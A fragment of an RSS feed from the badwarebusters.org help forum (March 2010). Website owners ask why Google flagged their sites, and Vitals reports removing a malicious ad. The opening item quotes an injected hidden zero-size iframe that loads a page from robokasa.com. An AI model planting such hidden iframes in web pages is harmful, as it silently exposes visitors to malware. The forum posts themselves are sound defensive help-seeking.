&amp;lt;iframe src=&amp;#8220;http://robokasa.com/lib/index.php&amp;#8221; width=0 height=0 style=&amp;#8220;hidden&amp;#8221; frameborder=0 marginheight=0 marginwidth=0 scrolling=no&amp;gt;&amp;lt;/if&amp;nbsp;rame&amp;gt;&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (manny)</author>
      <pubDate>Fri, 12 Mar 2010 13:29:50 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15660</link>
      <guid>http://badwarebusters.org/main/itemview/15660</guid>
    </item>
    <item>
      <title>Update about www.vitals.com/ratings</title>
      <description>&lt;p&gt;Notice to Vitals users:&lt;/p&gt;
&lt;p&gt;This malicious software was distributed through an advertisement delivered by a 3rd party ad network and hosted at farabowg.com.  We immediately removed the ad at 9:30 am on Thursday, March 11 as soon as we discovered the problem.  Our site has since been confirmed by Google and StopBadware.org as free from badware or any other suspicious activity.  However, if you have any questions, please either follow the instructions at http://stopbadware.org/home/badware_remove or contact us at support@vitals.com.&lt;/p&gt;
&lt;p&gt;Thank you for your continued use of Vitals.  We wish you and your computer continued good health.&lt;/p&gt;
&lt;p&gt;Sincerely,&lt;/p&gt;
&lt;p&gt;The Vitals Team&lt;br /&gt;
support@vitals.com&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (vitals)</author>
      <pubDate>Fri, 12 Mar 2010 12:13:05 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15656</link>
      <guid>http://badwarebusters.org/main/itemview/15656</guid>
    </item>
    <item>
      <title>Site reported as attack site</title>
      <description>&lt;p&gt;My site, www.miltonweb.ca has been reported as an attack site.&lt;/p&gt;
&lt;p&gt;I checked it thoroughly and could not find any malicious code.  I also used www.dasient.com to search the site and they returned a perfect rating (no malicious code).&lt;/p&gt;
&lt;p&gt;In using Google&amp;#8217;s Safebrowsing Diagnotic is says that attack sites were hosted on my network.  Does this mean it&amp;#8217;s my web host?  It&amp;#8217;s been down now for over 24 hours so I&amp;#8217;m panicking huge!!&lt;/p&gt;
&lt;p&gt;I really need help here as this site is my lifeline.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;br /&gt;
Chris Edwards&lt;br /&gt;
Owner, MiltonWeb.ca&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (homeroom1)</author>
      <pubDate>Fri, 12 Mar 2010 10:02:31 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15654</link>
      <guid>http://badwarebusters.org/main/itemview/15654</guid>
    </item>
    <item>
      <title>Potential malware?</title>
      <description>&lt;p&gt;Google have listed my site www.brightonsunblinds.co.uk as possibley being infected by malicious software. However, I have no idea how to detect the code(?) that is causing the problem. I contacted &lt;span&gt;NTL&lt;/span&gt; who host my site, but they told me the site seemed to be okay, but the site is still blocked. I have no idea what to do, could anyone please help me?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (brightonsunblinds)</author>
      <pubDate>Fri, 12 Mar 2010 09:00:36 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15653</link>
      <guid>http://badwarebusters.org/main/itemview/15653</guid>
    </item>
    <item>
      <title>Malware</title>
      <description>&lt;p&gt;Today I received an e-mail from Google saying my site www.lainfancia.net is possibly infected by malicious software. However, I have no idea how to detect the code(?) that is causing the problem. I contacted my webhost, but they told me the site seemed to be okay, but the site is still blocked. I have no idea what to do, could anyone please help me?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (adrianstiletano)</author>
      <pubDate>Fri, 12 Mar 2010 06:57:12 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15650</link>
      <guid>http://badwarebusters.org/main/itemview/15650</guid>
    </item>
    <item>
      <title>Site reported as attack site</title>
      <description>&lt;p&gt;I have some kind of virus that adds code to my files.&lt;br /&gt;
I have had to recreate an account and reupload all the files which were not infected.&lt;br /&gt;
How can I find out where the attack came from and how I can secure it in case of future attacks?&lt;br /&gt;
My site has been down for over 2 weeks and even most of my backups got infected.&lt;br /&gt;
If anyone can offer help with resolving this I would really appreciate it as this is a first for me.&lt;br /&gt;
Thanks&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (cancasa)</author>
      <pubDate>Fri, 12 Mar 2010 03:53:43 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15645</link>
      <guid>http://badwarebusters.org/main/itemview/15645</guid>
    </item>
    <item>
      <title>Google report warning message for my web site again</title>
      <description>&lt;p&gt;Hi , My website again blocked by google , i run kitchen business and have little idea on what&amp;#8217;s happening , based on previos suggestion i have kept all passwords safe. I have looked the pages again but couldn&amp;#8217;t find any issue that mentioned last time , urgent help needed.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (malhotra_km)</author>
      <pubDate>Fri, 12 Mar 2010 02:19:35 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15644</link>
      <guid>http://badwarebusters.org/main/itemview/15644</guid>
    </item>
    <item>
      <title>Please help with webhostingchat.com</title>
      <description>&lt;p&gt;We were running older version of  vbulletin and upgraded it to latest version and still we have problem. Can you please check why is it causing? I couldn&amp;#8217;t find anything.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (daviddavid)</author>
      <pubDate>Thu, 11 Mar 2010 21:30:21 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15642</link>
      <guid>http://badwarebusters.org/main/itemview/15642</guid>
    </item>
    <item>
      <title>My site is marked as malicious, no idea how to detec...</title>
      <description>&lt;p&gt;Today I received an e-mail from Google saying my site www.blackfuel.nl is possibly infected by malicious software. However, I have no idea how to detect the code(?) that is causing the problem. I contacted my webhost, but they told me the site seemed to be okay, but the site is still blocked. I have no idea what to do, could anyone please help me?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (Blackfueler)</author>
      <pubDate>Thu, 11 Mar 2010 19:43:25 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15639</link>
      <guid>http://badwarebusters.org/main/itemview/15639</guid>
    </item>
    <item>
      <title>Not sure where to start</title>
      <description>&lt;p&gt;My website has been infected with Malware: www.bayview-golfcourse.com.  It has infected all of the business computers with a Trojan Horse.  I do not currently have a clean version of the webfiles, since all the webfiles are on infected computers.&lt;/p&gt;
&lt;p&gt;Where do I start first?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (tiffmill)</author>
      <pubDate>Thu, 11 Mar 2010 17:01:02 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15634</link>
      <guid>http://badwarebusters.org/main/itemview/15634</guid>
    </item>
    <item>
      <title>Warning: google thinks every site may harm your comp...</title>
      <description>&lt;p&gt;my domain aucenter.edu is being reported as: Warning: Google thinks every site may harm your computer; yet there is no content on it &#8230; I&#8217;ve removed all the content.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (mcp0500)</author>
      <pubDate>Thu, 11 Mar 2010 16:04:09 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15632</link>
      <guid>http://badwarebusters.org/main/itemview/15632</guid>
    </item>
  </channel>
</rss>
